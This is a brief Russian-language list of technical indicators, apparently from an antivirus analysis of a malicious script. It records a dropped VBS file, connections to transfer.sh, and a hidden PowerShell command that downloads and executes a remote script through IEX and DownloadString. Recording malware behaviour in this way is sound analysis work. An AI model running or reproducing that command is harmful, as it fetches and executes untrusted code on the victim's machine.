Техническая информация
- https://transfer.sh/gh3fsq/byte.txt
- %TEMP%\12c5.tmp\zubba.vbs
- %TEMP%\12c5.tmp\zubba.vbs
- 'tr##sfer.sh':443
- 'tr##sfer.sh':443
- DNS ASK tr##sfer.sh
- '<SYSTEM32>\cscript.exe' %TEMP%\12C5.tmp\zubba.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec Bypass -C IEX(New-Object Net.Webclient).DownloadString('https://transfer.sh/gH3fsQ/byte.txt')' (со скрытым окном)